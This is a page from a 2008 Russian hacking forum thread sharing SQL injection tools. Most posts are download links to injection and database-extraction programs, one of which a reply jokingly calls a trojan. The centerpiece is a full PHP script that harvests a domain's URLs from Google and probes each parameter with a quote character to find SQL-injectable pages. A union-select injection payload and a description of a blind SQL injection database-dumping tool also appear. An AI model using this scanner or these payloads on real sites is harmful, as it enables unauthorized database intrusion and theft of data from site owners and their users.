ANTICHAT
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Injection Tools (https://forum.antichat.xyz/showthread.php?t=37037)

baltazar 05.09.2008 19:20
Microsoft SQL Database Extractor
 
http://img134.imageshack.us/img134/2847/dbsmb0.jpg
Скачать!

DimOnOID 05.09.2008 19:47
Спосибо за трояна!
SQL Helper 1.0
http://www.virustotal.com/ru/analisis/2dafc9437e19435ce04a1d086091c9a6

Fugitif 05.09.2008 23:06
SQL Helper v 2.0
 
http://img3.imagebanana.com/img/5a8zky8r/Injv2.jpg

VirusTotal analyse:

http://www.virustotal.com/analisis/f...0e129ba9358c84


Download:

http://rapidshare.com/files/142900562/IHv2.rar.html

warlok 08.09.2008 04:50
Код:
<?php
set_time_limit(0);
function google($domen){
$file=file_get_contents("http://www.google.ru/ie?q=site%3A$domen&hl=ru&newwindow=1&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&num=100");
//$file=file_get_contents("http://www.google.ru/ie?q=".urlencode(trim($text))."&hl=ru&lr=&newwindow=1&btnI=I%27m+Feeling+Lucky&num=10000");
$result = array ();
$ex = array ();
$regexp = '[0-9]. <a title="(.*)" href=(.*)>(.*)<\/a>';

if (preg_match_all("/$regexp/siU", $file, $matches)) {
foreach($matches[2] as $item) {
array_push($result,$item);
}

if (is_integer(strpos($file,"&start="))) { // От 0 до 100
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=100&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 100 до 200
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=200&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 200 до 300
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=300&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 300 до 400
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=400&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 400 до 500
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=500&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 500 до 600
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=600&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 600 до 700
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=700&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 700 до 800
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=800&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=900&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=1000&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}

for ($i = 0; $i <= count($result)-1; $i++) {
if (is_integer(strpos($result[$i],"="))) {
$s=$result[$i];
$s=str_replace("&","'&",$s);
$s = $s."'";
$rx=file_get_contents($s);
if (is_integer(strpos($rx,"SQL syntax"))){
flush();
echo "<span class=\"red\">$s</span><br>";}
}}

if(count($ex)==0)
array_push($ex,"<center><b>Not found</b></center>");

return $ex;
} else return "<center><b>Not found</b></center>";
}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SQL Inj Tester - Coded by ArxWolf, Powered by WebXakep.net - Russian</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="author" content="ArxWolf">
<style>
.red:link        { color: red; font-weight: bold; text-decoration: none;}
.red:visited        { color: red; font-weight: bold; text-decoration: none;}
.red:hover        { color: red; font-weight: bold; text-decoration: underline;}
.red:active        { color: red; font-weight: bold; text-decoration: none;}
body {
background-color: #1B1B1B;
font: normal 10px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #83AACB;
font-weight: bold;
}
input,textarea,select
{font: normal 11px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #B4B4B4;
background-color: #333333;
border-color: #424242;
border-left: 1px solid #0A0A0A;
border-top: 1px solid #0A0A0A;
border-right: 1px solid #2C2C2C;
border-bottom: 1px solid #2C2C2C;}
input:hover, textarea:hover, select:hover  {
border-color: #B6FF48;
color: #B6FF48;}
input:focus, textarea:focus, select:hover {
border-color: #B6FF48;
color: #ffffff;}
.td {
        border: 1px solid #666666;
}
</style>
</head>
<body>
<form method="post">
<table width="200"  border="0" align="center" class="td">
  <tr>
    <td nowrap>Host [Scanning a maximum of 1000 pages]:</td>
    <td><input type="text" name="tt" size="30"></td>
  </tr>
  <tr>
    <td colspan="2"><div align="right">
      <input type="submit" name="sbm" value="Run">
    </div></td>
  </tr>
</table>
</form>

<?php
if (isset($_POST['sbm'])){
$txt=$_POST['tt'];
if ($txt=="") die("<center><b>Empty</b></center>");
$res=google($txt);

}
?>

</body>
</html>

guest3297 08.09.2008 05:05
перезалейте SQL и XSS error error

GlobalRave 10.09.2008 17:44
Microsoft SQL Database Extractor Как в этой проге обозначить место с инъекцией?
Она такого плана 9999999+union+select+0,1,2,3,4,5,6,@@version+--

F1shka 14.09.2008 23:26
Я не Славик и не Димон, но я тчто то очкую качать.....

guest3297 15.09.2008 08:50
Цитата:
перезалейте SQL и XSS error finder
up

~!DoK_tOR!~ 15.09.2008 11:42
лови [ cash ] _http://rapidshare.com/files/17218785/937_SXF.rar.html

~!DoK_tOR!~ 20.09.2008 23:09
ISR-sqlget v.1.0.0

Description: ISR-sqlget: It's a blind SQL injection tool developed in Perl.
It lets you get databases schemas and tables rows.
Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

DATABASES SUPPORTED:

Код:
- IBM DB2
- Mcft SQL SERVER
- ORACLE
- POSTGRES
- MYSQL
- IBM INFORMIX
- SYBASE
- HSQLDB
- MIMER
- PERVASIVE
- VIRTUOSO
- SQLITE
- INTERBASE/YAFFIL/FIREBIRD
- H2
- MCKOI
- INGRES
- MONETDB
- MAXDB
- THINKSQL
- SQLBASE
Если не будет работать ошибка будет примерно такого вида:

Код:
Can't locate Convert/EastAsianWidth.pm in @INC (@INC contains: ./libs/ D:/Perl/site/lib D:/Perl/lib .) at connection.pm line 6
BEGIN failed--compilation aborted at connection.pm line 6.
Compilation failed in require at ISR-sqlget.pl line 30.
BEGIN failed--compilation aborted at ISR-sqlget.pl line 30.
скачиваем http://search.cpan.org/src/AUTRIJUS/Unicode-EastAsianWidth-1.02/lib/Unicode/EastAsianWidth.pm и вставляем его в папку D:\Perl\lib\Convert если папки Convert нет то создаём )

Download: _http://www.infobyte.com.ar/down/ISR-sqlget-1.0.0.tar.gz


Время: 11:52
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице